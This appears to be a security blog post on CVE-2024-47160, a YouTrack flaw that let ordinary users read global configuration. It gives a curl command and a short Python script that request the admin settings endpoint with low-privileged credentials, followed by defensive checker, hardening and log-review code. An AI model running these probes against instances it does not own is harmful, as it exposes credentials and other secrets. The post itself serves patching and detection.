The world of bug-hunting is full of surprises. Sometimes, a feature meant to make life easier for admins turns into a highway for hackers. That’s exactly what happened with JetBrains YouTrack – a popular project management and bug-tracking platform used by thousands of companies worldwide.

Let’s take a hands-on look at CVE-2024-47160. We’ll go over what happened, how you can spot similar issues, and check out a code snippet showing the exploit in action. If you run YouTrack on any build older than 2024.3.44799, you’ll want to read this.

What is CVE-2024-47160?

JetBrains’ advisory for CVE-2024-47160 (the NVD entry was published on September 19, 2024) describes a broken access control flaw in YouTrack: any authenticated user could read global application configuration data, whether or not they held the administrative permission that data is meant to require. The advisory does not spell out what the data contains, but global configuration in a tool like this typically holds SMTP server settings, integration keys and license details, so a regular user, or an attacker holding a stolen or phished account, could read material only administrators should see.

The NVD entry and the JetBrains support article:
🔗 https://nvd.nist.gov/vuln/detail/CVE-2024-47160
🔗 https://youtrack-support.jetbrains.com/hc/en-us/articles/18590217905170

Why Does It Matter?

Configuration data can include anything from API keys to secrets for third-party services. Anyone who can read it can reuse those credentials against the connected services (mail relay, integrations, and so on), and the leak itself is silent: nothing breaks, so nobody notices until the secrets are abused.

What Went Wrong?

In case you’re wondering, this wasn’t some ultra-sophisticated attack. It was a missing authorization check: before returning config data, YouTrack confirmed that the caller was logged in, but not that the caller held the permission needed to read global configuration. Any logged-in user could therefore request it through the web interface or a direct API call and bypass the intended restriction. Authentication answers “who are you?”; authorization answers “may you do this?”, and only the first question was being asked.

> Versions affected:
> Any release of YouTrack before 2024.3.44799
>
> Fixed in: 2024.3.44799

Let’s see this in code.

JetBrains’ advisory does not name the endpoint that leaked the data. YouTrack’s public REST API documents global settings under /api/admin/globalSettings, which makes it the natural place to look; the other paths sometimes suggested, /api/admin/serverConfig and /api/settings, are guesses rather than documented endpoints, so treat them as candidates to check, not facts.

Try this with your low-privileged user’s credentials (the -i flag prints the HTTP status line as well):

curl -i -u alice:alicePwd123 "https://your-youtrack-domain.com/api/admin/globalSettings"

YouTrack’s REST API documents permanent tokens (an Authorization: Bearer header) as the standard way to authenticate; if Basic authentication is not accepted on your instance, create a permanent token for the test user and send that header instead.

In a vulnerable YouTrack version, this might respond with a JSON object along these lines (the field names below are illustrative, not YouTrack’s real schema):

{
  "applicationName": "YouTrack Dev",
  "serverUrl": "https://your-youtrack-domain.com/",
  "smtpConfig": {
    "server": "smtp.company.com",
    "user": "noreply@company.com",
    "password": "secretPassword"
  },
  "licenseKey": "XXXXX-XXXXX-XXXXX-XXXXX",
  "otherSecrets": "... etc ..."
}

Boom—sensitive global app config, without being an admin.

Here's a simple exploit using requests, showing just how easy it is:

import requests

# Use low-privileged user credentials!
username = "user"
password = "userpwd"

# Candidate endpoint; the advisory does not name the one that leaked.
url = "https://your-youtrack-domain.com/api/admin/globalSettings"

response = requests.get(url, auth=(username, password), timeout=10)

if response.status_code == 200:
    print("Exposed config:")
    print(response.text)
elif response.status_code in (401, 403):
    print("Access denied: patched, or the account lacks API access.")
else:
    print(f"Unexpected status {response.status_code}: {response.text[:200]}")

If a user who is not an administrator gets a 200 response carrying configuration attributes, the instance is vulnerable. A 401 or 403 means the authorization check is in place (or the account has no API access at all). One caveat: YouTrack’s REST API returns only $type and id unless you name the attributes you want in the fields query parameter, so a near-empty 200 is not evidence either way; request specific attributes before drawing a conclusion.
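Putting the version check and the probe together, here is an added example (my own code, not JetBrains’ and not from the original post): a small Python checker that compares a YouTrack build string against the fixed build, classifies the response a low-privileged account gets from the endpoint, and redacts secret-looking values before printing anything. Assumptions, also labelled in the code: the probed path /api/admin/globalSettings is a guess (the advisory names no endpoint), the instance accepts a permanent token for the test user, and the attribute list you pass as fields comes from the REST API docs for your version. The version and classification logic runs offline against constructed responses; only probe() touches the network.

```python
import json
import re
import urllib.error
import urllib.request

# Build that JetBrains lists as fixed for CVE-2024-47160.
FIXED_VERSION = (2024, 3, 44799)

# Assumption, not confirmed by the advisory: the endpoint being probed.
CANDIDATE_PATH = "/api/admin/globalSettings"

# Heuristic: keys whose values a probe should never print or log.
SECRET_KEY_RE = re.compile(r"password|passwd|secret|token|key|credential", re.I)


def parse_version(version):
    """Turn a YouTrack build string such as '2024.3.44799' into a tuple."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)\s*", version)
    if not m:
        raise ValueError(f"unrecognised YouTrack version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_fixed(version):
    """True when the build is 2024.3.44799 or later."""
    return parse_version(version) >= FIXED_VERSION


def redact(obj):
    """Recursively mask values under secret-looking keys before display."""
    if isinstance(obj, dict):
        return {k: "***" if SECRET_KEY_RE.search(k) else redact(v)
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact(v) for v in obj]
    return obj


def classify(status, body):
    """Map the HTTP status and body seen by a low-privileged account to a verdict."""
    if status in (401, 403):
        return "denied"            # authorization check present, or no API access
    if status == 404:
        return "not-found"         # wrong path for this version
    if status != 200:
        return f"unexpected-{status}"
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "non-json"          # probably an HTML login or error page
    # YouTrack's REST API returns only $type and id unless the attributes
    # you want are named in the fields query parameter, so a skeleton 200
    # is not evidence either way.
    if isinstance(data, dict) and set(data) <= {"$type", "id"}:
        return "skeleton-retry-with-fields"
    return "exposed"


def probe(base_url, token, fields, timeout=10):
    """Request the candidate endpoint with a permanent token and classify it.

    Does network I/O, so it is not exercised offline. `fields` is the
    comma-separated attribute list you want YouTrack to return.
    """
    url = f"{base_url.rstrip('/')}{CANDIDATE_PATH}?fields={fields}"
    req = urllib.request.Request(url, headers={
        "Authorization": f"Bearer {token}",
        "Accept": "application/json",
    })
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode("utf-8", "replace")
    verdict = classify(status, body)
    if verdict == "exposed":
        print(json.dumps(redact(json.loads(body)), indent=2))
    return verdict


if __name__ == "__main__":
    # Offline self-check on constructed responses. To probe a real instance,
    # call probe(base_url, token, fields) with a low-privileged user's
    # permanent token and an attribute list from the REST API docs.
    print(is_fixed("2024.3.44799"), is_fixed("2024.2.30000"))
    print(classify(200, '{"$type":"GlobalSettings","id":"0"}'))
    print(classify(200, '{"mail":{"server":"smtp.example.com","password":"x"}}'))
```

The redaction step matters in practice: a probe that prints the raw response turns a test into a second leak, into your terminal history and whatever ticket the output gets pasted into.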

How to Fix

Update ASAP! JetBrains has released the fix in YouTrack 2024.3.44799; upgrade to that build or any later one.
- YouTrack Download Page

If you cannot patch immediately, restrict API access for low-privileged accounts (and review who has an account at all) until you can.

Also: rotate any secrets that were reachable through the configuration (API keys, SMTP passwords, integration tokens, and so on) after patching. Unless your logs prove nobody read them, treat them as exposed.

Prevention for the Future

This bug is a reminder for all web app developers: enforce authorization on the server for every endpoint, including administrative API routes, rather than relying on the UI to hide a feature; check the caller’s permission, not merely the presence of a session; and keep write-only secrets such as SMTP passwords out of API responses altogether, so that an authorization slip leaks far less.
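To make the bug class concrete, here is an added example (not YouTrack’s code, whose internals are not public, and not from the original post): a toy settings handler in Python showing first the vulnerable shape, where being logged in is the only gate, and then a hardened version that requires an explicit admin permission and strips write-only secrets from the response. The permission name ADMIN_READ_SETTINGS, the User model and the configuration contents are invented for illustration.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the caller may not perform the requested action."""


@dataclass(frozen=True)
class User:
    name: str
    permissions: frozenset = frozenset()


# Constructed stand-in for a server's global configuration (not real data).
GLOBAL_CONFIG = {
    "applicationName": "YouTrack Dev",
    "serverUrl": "https://your-youtrack-domain.com/",
    "smtp": {"server": "smtp.example.com", "user": "noreply@example.com",
             "password": "secretPassword"},
    "licenseKey": "XXXXX-XXXXX-XXXXX-XXXXX",
}

READ_SETTINGS = "ADMIN_READ_SETTINGS"   # hypothetical permission name

# Leaves that may be written through the admin UI but never read back.
WRITE_ONLY = {("smtp", "password")}


def get_global_settings_vulnerable(user):
    """Before: the only gate is being logged in (the CVE-2024-47160 pattern)."""
    if user is None:
        raise Forbidden("login required")
    return GLOBAL_CONFIG


def _without_write_only(config, path=()):
    """Copy the config, dropping every leaf listed in WRITE_ONLY."""
    out = {}
    for key, value in config.items():
        full = path + (key,)
        if full in WRITE_ONLY:
            continue
        out[key] = _without_write_only(value, full) if isinstance(value, dict) else value
    return out


def get_global_settings_fixed(user):
    """After: authenticate, then authorize against an explicit permission,
    deny by default, and never echo write-only secrets, not even to admins."""
    if user is None:
        raise Forbidden("login required")
    if READ_SETTINGS not in user.permissions:
        raise Forbidden(f"{user.name} lacks {READ_SETTINGS}")
    return _without_write_only(GLOBAL_CONFIG)


def demo():
    """Exercise both handlers with an ordinary user and an administrator."""
    alice = User("alice")                                  # low-privileged
    root = User("root", frozenset({READ_SETTINGS}))        # administrator
    out = {"vuln_alice_sees_password":
           get_global_settings_vulnerable(alice)["smtp"]["password"]}
    try:
        get_global_settings_fixed(alice)
        out["fixed_alice"] = "allowed"
    except Forbidden:
        out["fixed_alice"] = "denied"
    admin_view = get_global_settings_fixed(root)
    out["fixed_root_sees_server"] = admin_view["smtp"]["server"]
    out["fixed_root_sees_password"] = "password" in admin_view["smtp"]
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The second handler fails closed twice: an ordinary user is refused outright, and even the administrator never receives the SMTP password, so a future authorization bug in the same handler would expose far less.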

References and Further Reading

- Official JetBrains Advisory: https://youtrack-support.jetbrains.com/hc/en-us/articles/18590217905170
- CVE Description: https://nvd.nist.gov/vuln/detail/CVE-2024-47160
- YouTrack Security


TL;DR: If you’re running YouTrack and haven’t upgraded to 2024.3.44799 or later, any logged-in user could have read your app’s global configuration, secrets included, with a single API call. Update now, rotate secrets, and review your logs!
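For the log review, here is an added example (mine, not from the original post): a Python script that parses constructed access-log lines in a Common Log Format-like layout and reports non-admin accounts that successfully read a sensitive admin path, plus denied attempts that show who was probing. The log layout, the admin account list and the watched path are assumptions; the path follows the post’s guess at the endpoint, and YouTrack’s own logs or your reverse proxy’s will need the regex adapted.

```python
import re

# Constructed access-log lines (not a real capture) in a Common Log Format-like
# layout with the authenticated account in the third field. This is NOT
# YouTrack's own log format; adapt LOG_RE to what your proxy or server writes.
SAMPLE_LOG = """\
10.0.0.5 - alice [19/Sep/2024:18:20:01 +0000] "GET /api/issues?fields=id HTTP/1.1" 200 1532
10.0.0.5 - alice [19/Sep/2024:18:20:07 +0000] "GET /api/admin/globalSettings?fields=id HTTP/1.1" 200 2210
10.0.0.9 - root [19/Sep/2024:18:21:40 +0000] "GET /api/admin/globalSettings?fields=id HTTP/1.1" 200 2210
10.0.0.7 - bob [19/Sep/2024:18:22:13 +0000] "GET /api/admin/globalSettings HTTP/1.1" 403 87
10.0.0.7 - bob [19/Sep/2024:18:22:19 +0000] "GET /api/admin/globalSettings HTTP/1.1" 403 87
garbage line that should be skipped, not crash the review
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Assumptions: your real administrator accounts, and the paths whose successful
# reads by anyone else deserve a look. The endpoint is a guess; the advisory
# does not name the one that leaked.
ADMIN_ACCOUNTS = {"root"}
SENSITIVE_PATHS = ("/api/admin/globalSettings",)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that don't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["path"] = entry.pop("target").split("?", 1)[0]   # drop the query string
    return entry


def review(log_text, admins=ADMIN_ACCOUNTS, sensitive=SENSITIVE_PATHS):
    """Return (exposures, probes): successful reads of a sensitive path by a
    non-admin account, and denied attempts by non-admins, which reveal who tried."""
    exposures, probes = [], []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or entry["user"] in admins:
            continue
        if not any(entry["path"].startswith(p) for p in sensitive):
            continue
        if 200 <= entry["status"] < 300:
            exposures.append(entry)
        elif entry["status"] in (401, 403):
            probes.append(entry)
    return exposures, probes


if __name__ == "__main__":
    exposures, probes = review(SAMPLE_LOG)
    for e in exposures:
        print(f"EXPOSED {e['ts']} {e['user']}@{e['ip']} {e['path']} -> {e['status']}")
    for e in probes:
        print(f"DENIED  {e['ts']} {e['user']}@{e['ip']} {e['path']} -> {e['status']}")
```

On the sample above, alice’s successful read is the one that forces a secret rotation; bob’s two 403s are what the same search looks like after the patch, and repeated denials from one account are worth a conversation even though nothing leaked.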

Timeline

Published on: 09/19/2024 18:15:10 UTC
Last modified on: 09/24/2024 18:03:48 UTC